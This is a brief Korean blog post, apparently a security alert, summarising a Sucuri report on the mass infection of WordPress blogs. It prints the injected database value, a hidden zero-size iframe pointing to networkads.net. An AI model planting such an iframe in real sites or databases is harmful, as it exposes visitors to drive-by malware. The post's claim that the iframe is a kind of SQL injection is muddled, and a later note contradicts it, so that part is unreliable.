최근, 워드 프레스로 구현된 블로그 수백여개에서 데이터베이스가 손상되는 문제점이 발견되었습니다. 공격으로 인한 피해가 최신 버전의 WP에서도 발견된 것으로 알려져 있습니다.
삽입된 코드는 SQL Injection 공격의 대표적인 유형인 <iframe>이 포함되어 있는 것으로 보아 SQL Injection 취약점을 통해 공격한 것으로 추측됩니다. 그리고, 관리자페이지(~/wp-admin/)에 로그온이 제대로 되지 않는 문제점이 보여집니다.
(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),
공격 당한 사이트 URL: hxxp://networkads.net/grep/
한편, 아직 공격당한 지점(Entry Point)를 알아 내지 못하고 있으며, 임시로 DB에 주입된 문자열을 제거하는 수밖에는 없다고 합니다.
출처: http://blog.sucuri.net/2010/04/mass-infection-of-wordpress-blogs-at.html
PS: 보안 제품(안티바이러스)가 설치되지 않은 경우에는 공격 당한 사이트에 방문하면 큰일납니다. 참고로, 어베스트!에서는 잡아내므로 안심해도 됩니다.
PS: 해당 문제의 원인은 관리 페이지의 권한 문제였습니다.
끝.
